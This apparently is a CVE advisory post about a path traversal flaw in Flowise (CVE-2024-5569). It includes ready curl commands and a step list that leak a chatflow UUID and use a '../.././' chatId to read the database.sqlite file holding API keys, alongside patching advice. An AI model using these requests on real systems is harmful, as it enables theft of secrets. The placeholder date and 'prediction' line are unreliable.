Flowise, Path Traversal, CVE-2024-5569 (Critical)

Listen to this Post

The vulnerability exploits insufficient validation of the `chatId` parameter in the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints. The `streamStorageFile` function validates `chatflowId` as a UUID and sanitizes `fileName` but performs no checks on chatId. The final file path is initially validated to be within the `/root/.flowise/storage` directory. However, a fallback mechanism exists: if a file is not found, the `orgId` is removed from the path and a second read attempt is made. This fallback path is constructed as `path.join(getStoragePath(), chatflowId, chatId, sanitizedFilename)` and is checked after the initial path traversal guard. By providing a `chatId` value like ../.././, an attacker can traverse up to the parent directory (/root/.flowise/) and read critical files like database.sqlite, which contains all application secrets and API keys in the default configuration.
Platform: Flowise AI
Version: <=1.7.0
Vulnerability: Path Traversal
Severity: Critical

date: 2024-xx-xx

Prediction: Patch by 2024-12-01

What Undercode Say:

curl -X POST "http://target:3000/api/v1/vector/upsert/" -F "files=@malicious"
curl -G "http://target:3000/api/v1/get-upload-file" --data-urlencode "chatflowId=LEAKED_UUID" --data-urlencode "chatId=../.././" --data-urlencode "fileName=database.sqlite"
// streamStorageFile fallback logic
const fallbackPath = path.join(getStoragePath(), chatflowId, chatId, sanitizedFilename);
if (fs.existsSync(fallbackPath)) {
// Vulnerable file read
}

How Exploit:

  1. Leak a valid `chatflowId` UUID via the verbose error from /api/v1/vector/upsert/.
  2. Use the leaked UUID and a crafted `chatId` parameter (e.g., ../.././) to traverse to the `/root/.flowise/` directory.
  3. Read the `database.sqlite` file or any other local file.

Protection from this CVE

Apply vendor patch. Immediately restrict network access to Flowise. Implement strict input validation for the `chatId` parameter, rejecting any values containing path traversal sequences (../). Ensure the application runs with a dedicated low-privilege user account with minimal filesystem access.

Impact:

Complete compromise of all application data, including exposure of all stored API keys, leading to full administrative access and potential lateral movement within the environment.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top